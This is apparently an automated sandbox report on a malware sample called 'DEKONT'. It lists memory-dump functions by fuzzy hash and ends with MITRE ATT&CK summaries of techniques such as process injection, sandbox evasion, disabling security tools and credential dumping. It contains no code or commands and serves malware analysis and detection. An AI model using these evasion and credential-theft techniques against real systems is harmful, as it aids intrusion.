Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ee785d7932129b6b5430e5d0e798d22e07d9af7f299042d7041a76b0869feb
Instruction ID: e7d41332f3341f073cdbcb185305cba5b3008a49488543f04fa7547b1c59d492
Opcode Fuzzy Hash: 02ee785d7932129b6b5430e5d0e798d22e07d9af7f299042d7041a76b0869feb
Instruction Fuzzy Hash: 3A316D78D0120ADFDB149FB4E46C7EEBBB5EB4A34AF009829D1117A295CB781A44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DC7740 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba2cc7518f87a2eaf2a41e37fbcd1d3192a89eac21777833b5e136708cc06f3f
Instruction ID: ce5876279f60971423e7db33f9f5b3bb04bb6525038a714abefd7620e77949a4
Opcode Fuzzy Hash: ba2cc7518f87a2eaf2a41e37fbcd1d3192a89eac21777833b5e136708cc06f3f
Instruction Fuzzy Hash: 5721A4307082178BFF155639889477AB68A9FC4A59B24443DDA02CB394EF25CC42EBC0

Uniqueness

Uniqueness Score: -1.00%

Function 02DCA869 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92da4e16d418cc2e4bd5da2fa4a6f4949a4699f64da4213d5568da3759120a6e
Instruction ID: bc9bd5cda64be1bc481ac3f780dd0c37b8e9df0ab06f3bba45f8957d375e426d
Opcode Fuzzy Hash: 92da4e16d418cc2e4bd5da2fa4a6f4949a4699f64da4213d5568da3759120a6e
Instruction Fuzzy Hash: BB31A970A4050A8FCB04CF69C885A9EB7F6FF89754B258159E515973A5DB34DC02CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02DC20B8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6975286c6691dea3b1dd4dcbb07936f07928e11b9252bf29d7ddbcd01621925
Instruction ID: 27f39ac6457bc80dc96fbc03dfcc276e46184158a866fda38c0334eb69629934
Opcode Fuzzy Hash: a6975286c6691dea3b1dd4dcbb07936f07928e11b9252bf29d7ddbcd01621925
Instruction Fuzzy Hash: 0B218175A00106AFCF14DB74C8589AE77A5EB89360B20C51DE9499B354DB32EE49CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02DC5AC8 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f66f8617281171f9dbf2efefda1d15e777acd16779fc24d330b3f88a11b8f9b6
Instruction ID: 074f0df1d7335ba643b429c0364a2c0fd04e200469ee14d040098c5a9df6a151
Opcode Fuzzy Hash: f66f8617281171f9dbf2efefda1d15e777acd16779fc24d330b3f88a11b8f9b6
Instruction Fuzzy Hash: 8E21F3757006128BC726AF2AE4A4A2ABB93BFC8651764416DE906DB350CF30EC02CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 014ED044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3820821133.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_14ed000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2651818cdbd9233230873bc335a2bed03dd7858bba685bbae4d4979270efbc86
Instruction ID: abbc1bc402eb4ab12cbe3592b768d7fbb79d5b36a10e26b83b98e838bb47d666
Opcode Fuzzy Hash: 2651818cdbd9233230873bc335a2bed03dd7858bba685bbae4d4979270efbc86
Instruction Fuzzy Hash: 6D2125B1A043049FDB15DF54C9C8B16BFA1FB84319F24C66EE8490B3A2C736D447CA62

Uniqueness

Uniqueness Score: -1.00%

Function 02DC4E11 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eed902c5d31b2ffa5eabb3e97adbe130f0c674ef5c4f1f726087b786df58156
Instruction ID: 9a944bc2afd3418b6425122c34f1e6973be759d319bccea2a9cbac6d8839b80c
Opcode Fuzzy Hash: 6eed902c5d31b2ffa5eabb3e97adbe130f0c674ef5c4f1f726087b786df58156
Instruction Fuzzy Hash: 962105B260410A9FCB02AF65D464BAB37AAFF88351F11402DF9058B344CB38DC25CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 06CE9B40 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a14cbfe760ef0540b1f2595820ec7b8a85cb65a64fcb0afbadd841fb37517ea0
Instruction ID: 8f30f5a497adb1d4a0f3403aadac5217e3b02be26755fd3057e690b57c3fd952
Opcode Fuzzy Hash: a14cbfe760ef0540b1f2595820ec7b8a85cb65a64fcb0afbadd841fb37517ea0
Instruction Fuzzy Hash: 161104367043545FCF46AF7898682AE7FB3EFC5210B00446AE506DB3D1CE344D0697A6

Uniqueness

Uniqueness Score: -1.00%

Function 02DCE2D1 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a60e242a65be4152e7d42704d70c71a2ea44ad53433f1e6dd5b18a3f8385474a
Instruction ID: 0f2a2db95513fb6407840399d1aa9114a71e9af3778ebfee9108a6d374685b8b
Opcode Fuzzy Hash: a60e242a65be4152e7d42704d70c71a2ea44ad53433f1e6dd5b18a3f8385474a
Instruction Fuzzy Hash: 74215EB0D0120DDFDB40EFB9D954B9EBBF2FB84301F1085AAD504AB359EB345A058B91

Uniqueness

Uniqueness Score: -1.00%

Function 06CEE513 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698c72b9d838653ed39fcfdce92e3ad112e4b978324b0f70be27ab191a7f0823
Instruction ID: dacc8dc92768185fc28190a72078c6f661ac152d496d9324a12a1065ff4fec4c
Opcode Fuzzy Hash: 698c72b9d838653ed39fcfdce92e3ad112e4b978324b0f70be27ab191a7f0823
Instruction Fuzzy Hash: 2911E9347092448FD705163658546ABFFAF9FCA290F4884B7E106C3282DD288C058371

Uniqueness

Uniqueness Score: -1.00%

Function 02DC1FB8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e29dad65600976ff9bc21be1b802e84ea399431763199ab8836805e665fedd4
Instruction ID: 86a5183286318c0c6fcc250a748730db9add0260a03dcdb39c5128ffd59344aa
Opcode Fuzzy Hash: 1e29dad65600976ff9bc21be1b802e84ea399431763199ab8836805e665fedd4
Instruction Fuzzy Hash: 2F21CEB4C0120E8FCB44EFA8D8956EEBBF4FB49341F10562AD805B3214EB305A91CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CE9710 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca1acaa2fafa44f919c0c2f4ad7362d424b2f112e10a4cd50e4e41d7104ea5f
Instruction ID: 2d1cc606805d34928e2f9222b9cf9422e844ee1cc1d2b14fe014bfb95e45816b
Opcode Fuzzy Hash: 2ca1acaa2fafa44f919c0c2f4ad7362d424b2f112e10a4cd50e4e41d7104ea5f
Instruction Fuzzy Hash: 1D1117B680064D9FDB10DF99C845BDEBFF5FB48320F148419E614A7250C375A550DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06CE9311 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c8951458c9542cb3e95c5f5f850e914868f5f5ad9d5bba9adf03c190c8e9c1
Instruction ID: 5aa09df130e8397aadee58f4cefe9e00dfb937ba5d167633e7e4b9b3f5e4d2cc
Opcode Fuzzy Hash: 94c8951458c9542cb3e95c5f5f850e914868f5f5ad9d5bba9adf03c190c8e9c1
Instruction Fuzzy Hash: CB112A74F40249CFEB10DFE8D850BAEBBB1EB98310F408065E94CE7345EA3199028B51

Uniqueness

Uniqueness Score: -1.00%

Function 02DCE2E0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8500f67f7fe97c317afe089f207fe008bd5da14d835bdfcd317262b3793a4e3
Instruction ID: a9077620f89aefba7b77aceab7bbbb01dd769d3eb14d77f85a5f66378071f778
Opcode Fuzzy Hash: d8500f67f7fe97c317afe089f207fe008bd5da14d835bdfcd317262b3793a4e3
Instruction Fuzzy Hash: 5B113D74D01209DFDB40EFB9D554B9EBBF2FB84301F1085AAD104AB359EB305A058B81

Uniqueness

Uniqueness Score: -1.00%

Function 014ED03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3820821133.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_14ed000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: b424166e2880fcfba971ac911c53a828fbf3f421c2f521b5acb6506bc95f2b10
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: 2711AC759042448FCB16CF54C5C4B16BFA2FB44219F28C6AAD8494B3A3C33AD44ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 02DC565F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42624c9359729b0d4265bb6fd1b34291b125e9b93d9535938c8e742f735d77d
Instruction ID: 604d77264f467f0995584d0d0d89d2d386b7ba6c94ef85f7739712ecc064b201
Opcode Fuzzy Hash: e42624c9359729b0d4265bb6fd1b34291b125e9b93d9535938c8e742f735d77d
Instruction Fuzzy Hash: 8601F9726042456FCF03AE559810AEF7BABDFCD691B14802EF515D7344CA35DC12DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06CE2AC3 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7973b2067362b0a6c27a607cb4d59148eab3d5df4a2074fe545912cd3c7a6e3f
Instruction ID: bf3f391e18d5b2c20958852d91c0b032d051bed8ca1c2630c25c89fb961fa5f6
Opcode Fuzzy Hash: 7973b2067362b0a6c27a607cb4d59148eab3d5df4a2074fe545912cd3c7a6e3f
Instruction Fuzzy Hash: 0B018075E412158FCBA0DF78E44869ABBF9EF4975171009A9E40ADB311D735DD02CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06CE9DE9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfd30541ed8a1c5d5d002cb725ae6fed3000c541c06ea70ee6d33801b412df6a
Instruction ID: fa7b00d839743260bfdd0904869ad0a32e4ef3118607f32948eea5a52b02466d
Opcode Fuzzy Hash: dfd30541ed8a1c5d5d002cb725ae6fed3000c541c06ea70ee6d33801b412df6a
Instruction Fuzzy Hash: E31134B680064ADFDB10CF99C945BDEBBF4FF48320F148419EA58A7250C339A550DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06CE2A38 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 943168cf58b2b4b50614f37627de102bc75c5327f455cc9d9450905ed376a51c
Instruction ID: 0e2efc6877a56bfc60035093201e373bb15705005248e2bbd99392a05ba73fd0
Opcode Fuzzy Hash: 943168cf58b2b4b50614f37627de102bc75c5327f455cc9d9450905ed376a51c
Instruction Fuzzy Hash: C001A870E4021ADFCF54EFBAD8546AEB7B5BF48201F148569D419E7250E7399A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 06CE9BB0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7194ade1120eb14a26382806c03d2a156c87691fcddeed678a36279e0bad3d
Instruction ID: 9af05d794708fd0afdf97f321a9dc8fca091b346e9aecabbb62299a00440220f
Opcode Fuzzy Hash: 7d7194ade1120eb14a26382806c03d2a156c87691fcddeed678a36279e0bad3d
Instruction Fuzzy Hash: F2F089773002186FCF055E99AC549AF7FEBEFD8650B40442AFA05C7350DF31581597A5

Uniqueness

Uniqueness Score: -1.00%

Function 02DC2068 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 977413d6c26e7c6e077c6684b671e7cf7f8adbb137d6dd664cc6010c7e16fe61
Instruction ID: bdca0c90b35ae9ea89cb8398e07f9bfca0c183051aab880e512acdf23facaee1
Opcode Fuzzy Hash: 977413d6c26e7c6e077c6684b671e7cf7f8adbb137d6dd664cc6010c7e16fe61
Instruction Fuzzy Hash: 48E026B2C2022A93C700A7A1DC06ADFBB3CEFC1271F504226E41073140FBB4224982B0

Uniqueness

Uniqueness Score: -1.00%

Function 02DC2078 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d94fd92fb49d6a29398dc4d03f3107c53bfaa8e5e4c4b33345d2c4b500034b4
Instruction ID: e8071344c1759f604ed9db9e60af2667971d76bf36252c2dac849e7754d7ad73
Opcode Fuzzy Hash: 6d94fd92fb49d6a29398dc4d03f3107c53bfaa8e5e4c4b33345d2c4b500034b4
Instruction Fuzzy Hash: 8BD05B31D2022B97CB10E7A5DC044DFF73CEED5261B904626D52537150FB712659C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 02DC82B8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: c7d3945d24945e3a1a91751513d8cb220dd87a458d327dafbad790b63579520a
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 46C08C7320D1282AA236508E7C44EF3FB8CC3C13B4A31013BF99CE3301A8429C8091F4

Uniqueness

Uniqueness Score: -1.00%

Function 02DCA76D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe37ceb8925409b15a2217052c39b699555b4c21096e54c0124f64550cdf7ba
Instruction ID: ac59bd9a7a0e65b39ab7282c51c68016c77163f66b50145e04c40cf5e40752b7
Opcode Fuzzy Hash: cbe37ceb8925409b15a2217052c39b699555b4c21096e54c0124f64550cdf7ba
Instruction Fuzzy Hash: ADD0677BF410089FCB059F99E8849DDF7B6FB9C221B048516E915A7260C6319921DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02DC5F00 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba8b7b98d3edb7faa6aa2fa5845e5696394a23f372f61cc36a89fc4fa09c0e56
Instruction ID: 425cc384f34f528839043df25c99277d49e41342f6d7d90fc8befe9b926fca93
Opcode Fuzzy Hash: ba8b7b98d3edb7faa6aa2fa5845e5696394a23f372f61cc36a89fc4fa09c0e56
Instruction Fuzzy Hash: 01D0C27040838A0FD713B771E9A90583F22BA81106B44459598840A11BDA75081E8B62

Uniqueness

Uniqueness Score: -1.00%

Function 02DC5F10 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f32e0e302f0416ad3368e0fb925af4adb32e3f16c2b0b49ba08574f3ac0d3b99
Instruction ID: 2a252a302fbabaea2f0d1df7514c06b5d9d9d4bd6c495fc4e8e6841969afb6f5
Opcode Fuzzy Hash: f32e0e302f0416ad3368e0fb925af4adb32e3f16c2b0b49ba08574f3ac0d3b99
Instruction Fuzzy Hash: F5C0127050434F4BD642FB75FA58519372BB6C0502F404550A4090A11EDF7468584BE6

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

